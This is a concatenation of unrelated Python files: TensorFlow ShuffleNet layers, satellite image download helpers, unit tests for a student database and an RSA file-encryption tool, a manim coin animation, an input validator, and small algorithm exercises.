with tf.variable_scope('g_conv_1'):
result = _group_conv(result, in_channels, groups)
result = _batch_norm(result, is_training)
result = _nonlinearity(result)
with tf.variable_scope('channel_shuffle_2'):
result = _channel_shuffle(result, groups)
with tf.variable_scope('dw_conv_3'):
result = _depthwise_conv(result, stride=stride)
result = _batch_norm(result, is_training)
with tf.variable_scope('g_conv_4'):
result = _group_conv(result, in_channels, groups)
result = _batch_norm(result, is_training)
if stride < 2:
result = tf.add(result, X)
else:
X = _avg_pooling(X)
result = tf.concat([result, X], 3)
result = _nonlinearity(result)
return result
# first shufflenet unit is different from the rest
def _first_shufflenet_unit(X, is_training, groups, out_channels):
in_channels = X.shape.as_list()[3]
result = X
out_channels -= in_channels
with tf.variable_scope('g_conv_1'):
result = _group_conv(result, out_channels, groups=1)
result = _batch_norm(result, is_training)
result = _nonlinearity(result)
with tf.variable_scope('dw_conv_2'):
result = _depthwise_conv(result, stride=2)
result = _batch_norm(result, is_training)
with tf.variable_scope('g_conv_3'):
result = _group_conv(result, out_channels, groups)
result = _batch_norm(result, is_training)
X = _avg_pooling(X)
result = tf.concat([result, X], 3)
result = _nonlinearity(result)
return result
def _affine(X, size):
input_dim = X.shape.as_list()[1]
# kaiming uniform initialization
maxval = math.sqrt(6.0/input_dim)
W = tf.get_variable(
'kernel', [input_dim, size], tf.float32,
tf.random_uniform_initializer(-maxval, maxval)
)
b = tf.get_variable(
'bias', [size], tf.float32,
tf.zeros_initializer()
)
return tf.nn.bias_add(tf.matmul(X, W), b)
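# Illustrative graph-construction sketch (TF1-style, matching the API used above).
# The input size and num_classes are arbitrary, and the module has to be imported
# from its package so that the relative CONSTANTS import resolves:
#
#   images = tf.placeholder(tf.float32, [None, 56, 56, 3])
#   is_training = tf.placeholder(tf.bool, [])
#   logits = _mapping(images, is_training, num_classes=200, groups=3)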
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is part of CbM (https://github.com/ec-jrc/cbm).
# Author : Konstantinos Anastasakis
# Credits : GTCAP Team
# Copyright : 2021 European Commission, Joint Research Centre
# License : 3-Clause BSD
import os
import json
import glob
from os.path import join, normpath, exists, isfile
from cbm.utils import spatial_utils, config
def by_location(aoi, year, lon, lat, chipsize=512, extend=512,
tms=['Google'], axis=True, debug=False):
"""Download the background image with parcels polygon overlay by selected
location. This function will get an image from the center of the polygon.
Examples:
from cbm.view import background
        background.by_location(aoi, year, lon, lat, 512, 512, 'Google',
                               True, True)
Arguments:
aoi, the area of interest (str)
year, the year of parcels table
lon, lat, longitude and latitude in decimal degrees (float).
chipsize, size of the chip in pixels (int).
extend, size of the chip in meters (float).
tms, tile map server Google or Bing (str).
debug, print or not procedure information (Boolean).
"""
get_requests = data_source()
if type(tms) is str:
tms = [tms]
try:
json_data = json.loads(get_requests.ploc(aoi, year, lon, lat,
True, False, debug))
if type(json_data['ogc_fid']) is list:
pid = json_data['ogc_fid'][0]
else:
pid = json_data['ogc_fid']
workdir = normpath(join(config.get_value(['paths', 'temp']),
aoi, str(year), str(pid)))
if debug:
print('pid: ', pid)
print('workdir: ', workdir)
print('json_data: ', json_data)
json_file = normpath(join(workdir, 'info.json'))
os.makedirs(workdir, exist_ok=True)
if not isfile(json_file):
with open(json_file, "w") as f:
json.dump(json_data, f)
except Exception as err:
workdir = normpath(join(config.get_value(['paths', 'temp']), aoi,
str(year), f'_{lon}_{lat}'.replace('.', '_')))
if debug:
print("No parcel information found.", err)
bg_path = normpath(join(workdir, 'backgrounds'))
os.makedirs(bg_path, exist_ok=True)
with open(f"{bg_path}/chipsize_extend_{chipsize}_{extend}", "w") as f:
f.write('')
if debug:
print('bg_path: ', bg_path)
print('lon, lat:', lon, lat)
for t in tms:
if debug:
print('lon, lat, chipsize, extend, t, bg_path, debug')
print(lon, lat, chipsize, extend, t, bg_path, debug)
get_requests.background(lon, lat, chipsize, extend, t, bg_path, debug)
def by_pid(aoi, year, pid, chipsize=512, extend=512,
tms=['Google'], axis=True, debug=False):
"""Download the background image with parcels polygon overlay by selected
location.
Examples:
from cbm.view import background
        background.by_pid(aoi, year, pid, 512, 512, 'Google',
                          True, True)
Arguments:
aoi, the area of interest (str)
year, the year of parcels table
pid, the parcel id (str).
chipsize, size of the chip in pixels (int).
extend, size of the chip in meters (float).
tms, tile map server Google or Bing (str).
debug, print or not procedure information (Boolean).
"""
get_requests = data_source()
if type(tms) is str:
tms = [tms]
workdir = normpath(join(config.get_value(['paths', 'temp']),
aoi, str(year), str(pid)))
if debug:
print('workdir: ', workdir)
json_file = normpath(join(workdir, 'info.json'))
if not isfile(json_file):
json_data = json.loads(get_requests.pid(aoi, year, pid,
None, True, False, debug))
os.makedirs(workdir, exist_ok=True)
with open(json_file, "w") as f:
json.dump(json_data, f)
else:
with open(json_file, 'r') as f:
json_data = json.load(f)
lon = json_data['clon'][0]
lat = json_data['clat'][0]
bg_path = normpath(join(workdir, 'backgrounds'))
os.makedirs(bg_path, exist_ok=True)
with open(f"{bg_path}/chipsize_extend_{chipsize}_{extend}", "w") as f:
f.write('')
if debug:
print('bg_path: ', bg_path)
print('lon, lat:', lon, lat)
for t in tms:
if debug:
print('lon', 'lat', 'chipsize', 'extend', 't', 'bg_path', 'debug')
print(lon, lat, chipsize, extend, t, bg_path, debug)
get_requests.background(lon, lat, chipsize, extend, t, bg_path, debug)
def data_source():
source = config.get_value(['set', 'data_source'])
if source == 'api':
from cbm.datas import api
return api
elif source == 'direct':
from cbm.datas import direct
return direct
|
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 27 04:12:53 2019
@author: Sumit Gupta
@CWID : 10441745
"""
import unittest
from HW11_Sumit_Gupta import file_reading_gen, Repository, main
class TestRepository(unittest.TestCase):
"""
    Class to test all the methods in HW11_Sumit_Gupta.py
"""
def test_stevens_info(self):
"""
Test if all the content of the file are loaded correctly or not
"""
stevens = Repository('Test',False)
students_info = {'10103': ['10103', 'Jobs, S', 'SFEN', {'SSW 810': 'A-', 'CS 501':'B'}],
'10115': ['10115', 'Bezos, J', 'SFEN', {'SSW 810': 'A', 'CS 546': 'F'}],
'10183': ['10183', 'Musk, E', 'SFEN', {'SSW 555': 'A', 'SSW 810': 'A'}],
'11714': ['11714', 'Gates, B', 'CS', {'SSW 810': 'B-', 'CS 546': 'A','CS 570': 'A-'}]
}
instructors_info = {'98764': ['98764', 'Cohen, R', 'SFEN', {'CS 546': 1}],
'98763': ['98763', 'Rowland, J', 'SFEN', {'SSW 810': 4, 'SSW 555': 1}],
'98762': ['98762', 'Hawking, S', 'CS', {'CS 501': 1, 'CS 546': 1, 'CS 570': 1}]}
majors_info = {'SFEN': ['SFEN', ('SSW 540', 'SSW 555', 'SSW 810'),('CS 501', 'CS 546')],
'CS': ['CS', ('SYS 800', 'SYS 612', 'SYS 671'),('SSW 565', 'SSW 810')]}
students_dic = dict()
for cwid, student in stevens.students.items():
students_dic[cwid] = student.get_whole_info()
instructors_dic = dict()
for cwid, instructor in stevens.instructors.items():
instructors_dic[cwid] = instructor.get_whole_info()
majors_dic = dict()
for major, major_info in stevens.majors.items():
majors_dic[major] = major_info.get_whole_info()
self.assertEqual(students_dic, students_info)
self.assertEqual(instructors_dic, instructors_info)
for item, major in majors_dic.items():
self.assertEqual(major[0], majors_info[item][0])
self.assertTrue(major[1], majors_info[item][1])
self.assertTrue(major[2], majors_info[item][2])
def test_student_courses_info(self):
"""
Test student successfully completed courses, remaining required courses and electives
"""
stevens = Repository('Test',False)
courses_info = {'10103': [['CS 501', 'SSW 810'], {'SSW 555', 'SSW 540'}, None],
'10115': [['SSW 810'], {'SSW 555', 'SSW 540'}, {'CS 501', 'CS 546'}],
'10183': [['SSW 555', 'SSW 810'], {'SSW 540'}, {'CS 501', 'CS 546'}],
'10175': [['SSW 567', 'SSW 564', 'SSW 687'], ['SSW 540', 'SSW 555'], \
['CS 501', 'CS 513', 'CS 545']],
'11714': [['CS 546', 'CS 570', 'SSW 810'], None, None]}
courses_dic = dict()
for cwid, student in stevens.students.items():
courses_dic[cwid] = stevens.majors[student.major].update_courses(student.courses)
self.assertTrue(courses_dic, courses_info)
def test_db(self):
stevens = Repository('Test', False)
instructor_db_info = [(98762, 'Hawking, S', 'CS', 'CS 501', 1),
(98762, 'Hawking, S', 'CS', 'CS 546', 1), (98762, 'Hawking, S', 'CS', 'CS 570', 1),
(98763, 'Rowland, J', 'SFEN', 'SSW 555', 1), (98763, 'Rowland, J', 'SFEN', 'SSW 810', 4),
(98764, 'Cohen, R', 'SFEN', 'CS 546', 1)]
self.assertEqual(stevens.query_list, instructor_db_info)
if __name__ == '__main__':
unittest.main(exit=False, verbosity=2)
# To execute main function that prints the pretty table
print("\n===============================================================================")
main()
|
#!/usr/bin/env python
import common, unittest
import io, os, tempfile, sys
from cryptography.hazmat.primitives import serialization as crypto_serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend as crypto_default_backend
mod = common.load('encrypt_file', common.TOOLS_DIR + '/scripts/files/encrypt_file.py')
class MockWrapper(mod.CommandWrapper):
def __init__(self):
super().__init__()
self.errors = []
self.notices = []
self.environ = {}
def log_error(self, msg):
self.errors.append(msg)
def log_notice(self, msg):
self.notices.append(msg)
class MockWrapperTests(common.TestCase):
def setUp(self):
self.wrapper = MockWrapper()
def test_log_error(self):
self.wrapper.log_error('abc')
self.assertEqual('abc', self.assertSingle(self.wrapper.errors))
def test_log_notice(self):
self.wrapper.log_notice('abc')
self.assertEqual('abc', self.assertSingle(self.wrapper.notices))
'''
Tests involving my RSA encryption wrapper
'''
class RSAWrapperTests(common.TestCase):
def setUp(self):
self.wrapper = MockWrapper()
def make_keypair(self, directory, label):
path_private_key = os.path.join(directory, '%s.rsa.private' % label)
path_public_key = os.path.join(directory, '%s.rsa.public' % label)
key = rsa.generate_private_key(
backend=crypto_default_backend(),
public_exponent=65537,
key_size=2048
)
private_key = key.private_bytes(
crypto_serialization.Encoding.PEM,
crypto_serialization.PrivateFormat.PKCS8,
crypto_serialization.NoEncryption()
)
with open(path_private_key, 'wb') as f:
f.write(private_key)
public_key = key.public_key().public_bytes(
crypto_serialization.Encoding.PEM,
crypto_serialization.PublicFormat.PKCS1
)
with open(path_public_key, 'wb') as f:
f.write(public_key)
return path_public_key, path_private_key
def assertFail(self, **kwargs):
self.assertEqual(1, self.wrapper.run(**kwargs))
def assertSuccess(self, **kwargs):
self.assertEqual(0, self.wrapper.run(**kwargs))
self.assertEmpty(self.wrapper.errors)
def test_check_required_file_fail_no_exist(self):
label = 'MY LABEL'
with tempfile.TemporaryDirectory() as td:
path = os.path.join(td, 'nope')
self.assertFalse(self.wrapper.check_required_file(label, path))
error = self.assertSingle(self.wrapper.errors)
self.assertStartsWith('%s ' % label, error)
self.assertContains('does not exist', error)
self.assertEndsWith(path, error)
def test_check_required_file_fail_not_provided(self):
label = 'MY LABEL'
self.assertFalse(self.wrapper.check_required_file(label, ''))
error = self.assertSingle(self.wrapper.errors)
self.assertEqual('%s not provided.' % label, error)
def test_check_required_file_pass_dash(self):
self.assertTrue(self.wrapper.check_required_file('moot', '-'))
self.assertEmpty(self.wrapper.errors)
def test_error_ambiguous(self):
run_kwargs = {
'args': ['-d', '-e']
}
self.assertFail(**run_kwargs)
self.assertContains('Ambiguous arguments, unsure whether we want to encrypt or decrypt.', self.wrapper.errors)
def test_load_keyfile_private_error(self):
label = 'mylabel'
with tempfile.TemporaryDirectory() as td:
path = os.path.join(td, 'nope')
self.assertFalse(self.wrapper.load_keyfile_private(label, path, None))
error = self.assertSingle(self.wrapper.errors)
self.assertContains('does not exist', error)
self.assertEndsWith(path, error)
def test_load_keyfile_private_error_env(self):
label = 'mylabel'
with tempfile.TemporaryDirectory() as td:
path = os.path.join(td, 'nope')
self.wrapper.environ['PRIVATE'] = path
self.assertFalse(self.wrapper.load_keyfile_private(label, path, 'PRIVATE'))
error = self.assertSingle(self.wrapper.errors)
self.assertContains('does not exist', error)
self.assertContains('environment variable', error)
self.assertEndsWith(path, error)
def test_load_keyfile_public_error(self):
label = 'mylabel'
with tempfile.TemporaryDirectory() as td:
path = os.path.join(td, 'nope')
self.assertFalse(self.wrapper.load_keyfile_public(label, path, None))
error = self.assertSingle(self.wrapper.errors)
self.assertContains('does not exist', error)
self.assertEndsWith(path, error)
def test_load_keyfile_public_error_env(self):
label = 'mylabel'
with tempfile.TemporaryDirectory() as td:
path = os.path.join(td, 'nope')
self.wrapper.environ['PUBLIC'] = path
self.assertFalse(self.wrapper.load_keyfile_public(label, path, 'PUBLIC'))
error = self.assertSingle(self.wrapper.errors)
self.assertContains('does not exist', error)
self.assertContains('environment variable', error)
self.assertEndsWith(path, error)
'''
Confirm that we can encrypt and decrypt a file using paths using the outermost main() function
'''
def test_main_encrypt_and_decrypt(self):
contents = b"THIS IS MY FILE CONTENT"
with tempfile.TemporaryDirectory() as td:
path_raw = os.path.join(td, 'raw')
path_enc = os.path.join(td, 'enc')
path_out = os.path.join(td, 'out')
with open(path_raw, 'wb') as f:
f.write(contents)
public, private = self.make_keypair(td, 'test')
enc_args = ['--public', public, '-i', path_raw, '-o', path_enc]
self.assertEqual(0, mod.main(enc_args, {}, MockWrapper))
self.assertEmpty(self.wrapper.errors)
self.assertEmpty(self.wrapper.notices)
self.assertTrue(os.path.isfile(path_enc))
with open(path_enc, 'rb') as stream_enc:
enc = stream_enc.read()
self.assertDoesNotContain(contents, enc)
dec_args = ['--private', private, '-i', path_enc, '-o', path_out]
self.assertEqual(0, mod.main(dec_args, {}, MockWrapper))
self.assertEmpty(self.wrapper.errors)
self.assertEmpty(self.wrapper.notices)
with open(path_out, 'rb') as stream_out:
out = stream_out.read()
self.assertEqual(contents, out)
def test_main_keyboard_interrupt(self):
class KeyboardInterruptMockWrapper(MockWrapper):
def run(self, **kwargs):
raise KeyboardInterrupt()
wrapper = KeyboardInterruptMockWrapper()
self.assertEqual(130, mod.main([], {}, KeyboardInterruptMockWrapper))
def test_make_keypair(self):
with tempfile.TemporaryDirectory() as td:
public, private = self.make_keypair(td, 'test')
with open(private, 'r') as f:
contents = f.read()
self.assertContains('-BEGIN PRIVATE KEY-', contents)
with open(public, 'r') as f:
contents = f.read()
self.assertContains('-BEGIN RSA PUBLIC KEY-', contents)
def test_run_encrypt_single(self):
contents = b"THIS IS MY FILE CONTENT"
with tempfile.TemporaryDirectory() as td:
path_raw = os.path.join(td, 'raw')
path_enc = os.path.join(td, 'enc')
            with open(path_raw, 'wb') as f:
                f.write(contents)
public, private = self.make_keypair(td, 'test')
wrapper_kwargs = {
'args': ['--public', public, '-i', path_raw, '-o', path_enc]
}
self.assertSuccess(**wrapper_kwargs)
self.assertEmpty(self.wrapper.notices)
self.assertTrue(os.path.isfile(path_enc))
with open(path_enc, 'rb') as enc_stream:
enc = enc_stream.read()
self.assertDoesNotContain(contents, enc)
def test_run_encrypt_single_dash(self):
contents = b"THIS IS MY FILE CONTENT"
self.wrapper.get_stream_length = lambda stream: stream.getbuffer().nbytes
with tempfile.TemporaryDirectory() as td:
with io.BytesIO() as stream_raw:
with io.BytesIO() as stream_enc:
stream_raw.write(contents)
stream_raw.seek(0, 0)
public, private = self.make_keypair(td, 'test')
wrapper_kwargs = {
'args': ['--public', public, '-i', '-', '-o', '-'],
'dashstream_in': stream_raw,
'dashstream_out': stream_enc
}
self.assertSuccess(**wrapper_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_enc.seek(0, 0)
enc = stream_enc.read()
self.assertDoesNotContain(contents, enc)
'''
Confirm that we can encrypt and decrypt a file using paths.
'''
def test_run_encrypt_and_decrypt(self):
contents = b"THIS IS MY FILE CONTENT"
with tempfile.TemporaryDirectory() as td:
path_raw = os.path.join(td, 'raw')
path_enc = os.path.join(td, 'enc')
path_out = os.path.join(td, 'out')
with open(path_raw, 'wb') as f:
f.write(contents)
public, private = self.make_keypair(td, 'test')
enc_kwargs = {
'args': ['--public', public, '-i', path_raw, '-o', path_enc]
}
self.assertSuccess(**enc_kwargs)
self.assertEmpty(self.wrapper.notices)
self.assertTrue(os.path.isfile(path_enc))
with open(path_enc, 'rb') as stream_enc:
enc = stream_enc.read()
self.assertDoesNotContain(contents, enc)
dec_kwargs = {
'args': ['--private', private, '-i', path_enc, '-o', path_out]
}
self.assertSuccess(**dec_kwargs)
self.assertEmpty(self.wrapper.notices)
with open(path_out, 'rb') as stream_out:
out = stream_out.read()
self.assertEqual(contents, out)
'''
Confirm that we can encrypt and decrypt a file using streams.
'''
def test_run_encrypt_and_decrypt_dash(self):
contents = b"THIS IS MY FILE CONTENT"
self.wrapper.get_stream_length = lambda stream: stream.getbuffer().nbytes
with tempfile.TemporaryDirectory() as td:
with io.BytesIO() as stream_raw:
with io.BytesIO() as stream_enc:
with io.BytesIO() as stream_out:
stream_raw.write(contents)
stream_raw.seek(0, 0)
public, private = self.make_keypair(td, 'test')
wrapper_kwargs = {
'args': ['--public', public, '-i', '-', '-o', '-'],
'dashstream_in': stream_raw,
'dashstream_out': stream_enc
}
self.assertSuccess(**wrapper_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_enc.seek(0, 0)
enc = stream_enc.read()
stream_enc.seek(0, 0)
self.assertDoesNotContain(contents, enc)
dec_kwargs = {
'args': ['--private', private, '-i', '-', '-o', '-'],
'dashstream_in': stream_enc,
'dashstream_out': stream_out
}
self.assertSuccess(**dec_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_out.seek(0, 0)
out = stream_out.read()
self.assertEqual(contents, out)
'''
Confirm that we can encrypt and decrypt a file using streams and compression options.
'''
def test_run_encrypt_and_decrypt_dash_compression(self):
contents = b"THIS IS MY FILE CONTENT THAT WILL BE COMPRESSED"
self.wrapper.get_stream_length = lambda stream: stream.getbuffer().nbytes
for compression in ['--gzip', '--bz2', '--lzma']:
with tempfile.TemporaryDirectory() as td:
with io.BytesIO() as stream_raw:
with io.BytesIO() as stream_enc:
with io.BytesIO() as stream_out:
stream_raw.write(contents)
stream_raw.seek(0, 0)
public, private = self.make_keypair(td, 'test')
enc_kwargs = {
'args': ['--public', public, '-i', '-', '-o', '-', compression],
'dashstream_in': stream_raw,
'dashstream_out': stream_enc
}
self.assertSuccess(**enc_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_enc.seek(0, 0)
enc = stream_enc.read()
stream_enc.seek(0, 0)
self.assertDoesNotContain(contents, enc)
dec_kwargs = {
'args': ['--private', private, '-i', '-', '-o', '-'],
'dashstream_in': stream_enc,
'dashstream_out': stream_out
}
self.assertSuccess(**dec_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_out.seek(0, 0)
out = stream_out.read()
self.assertEqual(contents, out)
'''
Confirm that we can encrypt and decrypt a file with public/private key paths set as environment variables.
'''
def test_run_encrypt_and_decrypt_dash_environment_keys(self):
contents = b"THIS IS MY FILE CONTENT"
self.wrapper.get_stream_length = lambda stream: stream.getbuffer().nbytes
with tempfile.TemporaryDirectory() as td:
with io.BytesIO() as stream_raw:
with io.BytesIO() as stream_enc:
with io.BytesIO() as stream_out:
stream_raw.write(contents)
stream_raw.seek(0, 0)
public, private = self.make_keypair(td, 'test')
environ = {
'RSA_PUBLIC_KEY': public,
'RSA_PRIVATE_KEY': private
}
wrapper_kwargs = {
'args': ['-e', '-i', '-', '-o', '-'],
'dashstream_in': stream_raw,
'dashstream_out': stream_enc,
'environ': environ
}
self.assertSuccess(**wrapper_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_enc.seek(0, 0)
enc = stream_enc.read()
stream_enc.seek(0, 0)
self.assertDoesNotContain(contents, enc)
dec_kwargs = {
'args': ['-d', '-i', '-', '-o', '-'],
'dashstream_in': stream_enc,
'dashstream_out': stream_out,
'environ': environ
}
self.assertSuccess(**dec_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_out.seek(0, 0)
out = stream_out.read()
self.assertEqual(contents, out)
'''
Confirm that we can encrypt and decrypt a larger file stream.
This larger file is greater than the size of a single cipherblock.
'''
def test_run_encrypt_and_decrypt_dash_large(self):
contents = b"\nTHIS IS MY FILE CONTENT"
i = 0
while i < 10:
contents += contents
i += 1
self.assertTrue(len(contents) > 5000)
self.wrapper.get_stream_length = lambda stream: stream.getbuffer().nbytes
with tempfile.TemporaryDirectory() as td:
with io.BytesIO() as stream_raw:
with io.BytesIO() as stream_enc:
with io.BytesIO() as stream_out:
stream_raw.write(contents)
stream_raw.seek(0, 0)
public, private = self.make_keypair(td, 'test')
wrapper_kwargs = {
'args': ['--public', public, '-i', '-', '-o', '-'],
'dashstream_in': stream_raw,
'dashstream_out': stream_enc
}
self.assertSuccess(**wrapper_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_enc.seek(0, 0)
enc = stream_enc.read()
stream_enc.seek(0, 0)
self.assertDoesNotContain(contents, enc)
dec_kwargs = {
'args': ['--private', private, '-i', '-', '-o', '-'],
'dashstream_in': stream_enc,
'dashstream_out': stream_out
}
self.assertSuccess(**dec_kwargs)
self.assertEmpty(self.wrapper.notices)
stream_out.seek(0, 0)
out = stream_out.read()
self.assertEqual(contents, out)
'''
    Test that we can convert a condensed (binary) MD5 digest into its human-readable hex form.
'''
def test_translate_digest(self):
# MD5 Checksum of 'hello-world'
condensed = b' \x951!\x89u=\xe6\xadG\xdf\xe2\x0c\xbe\x97\xec'
expected = '2095312189753de6ad47dfe20cbe97ec'
# If you want to generate something new, do the following:
# from hashlib import md5
# m = md5()
# m.update(b'hello-world')
# print(m.digest(), m.hexdigest())
self.assertEqual(expected, mod._translate_digest(condensed))
|
# Copyright 2014 Daniel Reis
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
{
"name": "Add State field to Project Stages",
"version": "14.0.1.1.0",
"category": "Project Management",
"summary": "Restore State attribute removed from Project Stages in 8.0",
"author": "Daniel Reis, Odoo Community Association (OCA)",
"website": "https://github.com/OCA/project",
"license": "AGPL-3",
"installable": True,
"depends": ["project"],
"data": ["security/ir.model.access.csv", "views/project_view.xml"],
}
|
import numpy
from manim import *
from ep2.scenes.description import Coin
from ep2.scenes.utils import CyrTex
groups = [
[1, 1, 10, 10, 10, 10, 50, 50],
[1, 1, 10, 10, 20, 50, 50],
[1, 1, 20, 20, 50, 50],
[1, 1, 5, 5, 10, 5 + 5, 10, 50, 50],
[1, 1, 5, 5, 10, 20, 50, 50],
[1, 1, 5, 5, 5, 5, 20, 50, 50],
[1, 2, 2, 2, 5, 10, 10, 10, 50, 50],
[2, 10, 10, 10, 10, 50, 50],
[2, 10, 10, 20, 50, 50],
[2, 20, 20, 50, 50],
[2, 5, 5, 10, 10, 10, 50, 50],
[2, 5, 5, 10, 20, 50, 50],
[2, 5, 5, 5, 5, 10, 10, 50, 50],
[2, 5, 5, 5, 5, 20, 50, 50],
]
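# Note: every list above is a coin combination that totals 142 cents, matching the
# "142 ¢" amount rendered in the scene below; the brace label reports the coin count.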
class BruteForce(Scene):
def construct(self):
amount_cents_small = CyrTex(r'\foreignlanguage{bulgarian}{142 ¢} $=$').scale(2)
amount_cents_small.shift(amount_cents_small.get_width() * LEFT + UP * 0.5)
self.add(amount_cents_small)
mo_group = Group()
for loop in range(1):
for group in groups:
self.remove(mo_group)
# self.play(FadeOut(mo_group, run_time=0.05))
mo_group = Group()
uniq, counts = numpy.unique(group, return_counts=True)
print(uniq)
first = None
for coin, count in zip(uniq, counts):
print(f"{count} x {coin}")
mo_coins = [Coin(coin) for _ in range(count)]
mo_group.add(*mo_coins)
if first:
mo_coins[0].next_to(first, DOWN)
first = mo_coins[0]
for prev, cur in zip(mo_coins, mo_coins[1:]):
cur.next_to(prev, RIGHT)
brace = Brace(mo_group, direction=LEFT)
brace2 = BraceLabel(mo_group, r'\foreignlanguage{english}{$' + str(len(group)) + "$ coins}", label_constructor=CyrTex)
mo_group.add(brace, brace2)
mo_group.shift(amount_cents_small.get_critical_point(RIGHT) - brace.get_tip() + X_AXIS * DEFAULT_MOBJECT_TO_MOBJECT_BUFFER)
self.add(mo_group)
# self.play(FadeIn(mo_group, run_time=0.05))
self.wait(0.2)
self.wait()
self.play(FadeOut(amount_cents_small), FadeOut(mo_group))
self.wait(10)
|
"""
Program to compute the n-th harmonic number recursively.
The harmonic sum H(n) is the sum of the reciprocals of the first n positive integers: 1 + 1/2 + ... + 1/n.
"""
def harmonic_sum(n):
if n < 2:
return 1
else:
return 1 / n + (harmonic_sum(n - 1))
print(harmonic_sum(7))
print(harmonic_sum(4))
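# Worked check: harmonic_sum(4) = 1 + 1/2 + 1/3 + 1/4 ≈ 2.0833 and
# harmonic_sum(7) ≈ 2.5929, which the two print calls above should produce.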
|
class InputValidator:
"""
Input validation class. Available methods:
* validate_keys - validates a correct structure of input
* validate_input - validates data types, empty strings and other errors
"""
def __init__(self, input_data):
self.__input_data = input_data
@property
def validate_keys(self) -> dict:
"""
Validates input keys to ensure the correct structure of the input.
:return: json response ok if keys match, errors if input is incorrect.
"""
valid_keys = ("artist", "title", "release_format", "number_of_tracks", "release_year", "rating",
"votes", "have", "want", "limited_edition", "media_condition", "sleeve_condition")
if not all(name in self.__input_data for name in valid_keys):
return {
"response": "error",
"validation_errors": "missing keys, please refer to documentation"
}
return {"response": "ok"}
@property
    def validate_input(self) -> dict:
"""
Validates input values and builds an error response if any errors are present.
:return: json response ok if no errors, otherwise errors
"""
validation_errors = []
if self.validate_artist_not_str:
validation_errors.append(self.validate_artist_not_str)
if self.validate_title_not_str:
validation_errors.append(self.validate_title_not_str)
if self.validate_release_format_not_str:
validation_errors.append(self.validate_release_format_not_str)
if self.validate_artist_name_empty:
validation_errors.append(self.validate_artist_name_empty)
if self.validate_title_empty:
validation_errors.append(self.validate_title_empty)
if self.validate_release_format_empty:
validation_errors.append(self.validate_release_format_empty)
if self.validate_release_format_categories:
validation_errors.append(self.validate_release_format_categories)
if self.validate_limited_edition:
validation_errors.append(self.validate_limited_edition)
if self.validate_numerical_variables:
            validation_errors.extend(self.validate_numerical_variables)
if validation_errors:
return {
"response": "error",
"validation_errors": validation_errors
}
return {"response": "ok"}
@property
def validate_artist_not_str(self) -> [str, None]:
if not isinstance(self.__input_data["artist"], str):
return "Invalid data type for artist supplied. Artist name must be a string."
return
@property
def validate_title_not_str(self) -> [str, None]:
if not isinstance(self.__input_data["title"], str):
return "Invalid data type for title supplied. Title must be a string."
@property
def validate_release_format_not_str(self) -> [str, None]:
if not isinstance(self.__input_data["release_format"], str):
return "Invalid data type for release format. Release format must be a string."
@property
def validate_artist_name_empty(self) -> [str, None]:
if not self.__input_data["artist"]:
return "Artist name cannot be empty."
@property
def validate_title_empty(self) -> [str, None]:
if not self.__input_data["title"]:
return "Title cannot be empty."
@property
def validate_release_format_empty(self) -> [str, None]:
if not self.__input_data["release_format"]:
return "Release format cannot be empty."
@property
def validate_release_format_categories(self) -> [str, None]:
available_categories = ['12"', '10"', '7"', 'LP', 'EP']
if self.__input_data["release_format"] not in available_categories:
return f"Unknown release format category. Available categories: {available_categories}"
@property
def validate_limited_edition(self) -> [str, None]:
if not isinstance(self.__input_data["limited_edition"], bool):
return "Invalid data type for limited edition. Limited edition must be a boolean (true/false)."
@property
def validate_numerical_variables(self) -> list:
numerical_variables = [
self.__input_data["number_of_tracks"],
self.__input_data["release_year"],
self.__input_data["rating"],
self.__input_data["votes"],
self.__input_data["have"],
self.__input_data["want"],
self.__input_data["media_condition"],
self.__input_data["sleeve_condition"]
]
errors = []
for val in numerical_variables:
if not isinstance(val, (int, float)):
errors.append(f"Invalid data type {val}. Please provide a numeric value.")
return errors
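# Minimal usage sketch for the validator above; the record values are illustrative
# sample data, not taken from any real release.
if __name__ == "__main__":
    sample_record = {
        "artist": "Example Artist", "title": "Example Title", "release_format": "LP",
        "number_of_tracks": 10, "release_year": 1999, "rating": 4.5, "votes": 120,
        "have": 300, "want": 150, "limited_edition": False,
        "media_condition": 5, "sleeve_condition": 4,
    }
    validator = InputValidator(sample_record)
    print(validator.validate_keys)   # expected: {'response': 'ok'}
    print(validator.validate_input)  # expected: {'response': 'ok'}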
|
from decimal import Decimal, ROUND_HALF_UP
def get_dir(deg: float) -> str:  # pragma: no cover
if deg <= 0:
return 'C'
if deg < 11.25:
return 'N'
if deg < 33.75:
return 'NNE'
if deg < 56.25:
return 'NE'
if deg < 78.75:
return 'ENE'
if deg < 101.25:
return 'E'
if deg < 123.75:
return 'ESE'
if deg < 146.25:
return 'SE'
if deg < 168.75:
return 'SSE'
if deg < 191.25:
return 'S'
if deg < 213.75:
return 'SSW'
if deg < 236.25:
return 'SW'
if deg < 258.75:
return 'WSW'
if deg < 281.25:
return 'W'
if deg < 303.75:
return 'WNW'
if deg < 326.25:
return 'NW'
if deg < 348.75:
return 'NNW'
return 'N'
def get_wind(w: float) -> int: # pragma: no cover
if w <= 0.2:
return 0
if w <= 1.5:
return 1
if w <= 3.3:
return 2
if w <= 5.4:
return 3
if w <= 7.9:
return 4
if w <= 10.7:
return 5
if w <= 13.8:
return 6
if w <= 17.1:
return 7
if w <= 20.7:
return 8
if w <= 24.4:
return 9
if w <= 28.4:
return 10
if w <= 32.6:
return 11
return 12
def resolve():
deg, dis = map(int, input().split())
dir = get_dir(deg / 10)
wind = Decimal(str(dis / 60)).quantize(Decimal('0.1'), rounding=ROUND_HALF_UP)
w = get_wind(float(wind))
if w == 0:
dir = 'C'
print("{} {}".format(dir, w))
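# Worked example for resolve() above (assuming the input is "deg dis" on one line):
# "2750 30" -> deg / 10 = 275.0 -> 'W'; dis / 60 = 0.5 m/s -> Beaufort 1 -> prints "W 1".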
|
from numpy import zeros, unique
from pyNastran.bdf.field_writer_8 import set_blank_if_default
from pyNastran.bdf.field_writer_8 import print_card_8
from pyNastran.bdf.field_writer_16 import print_card_16
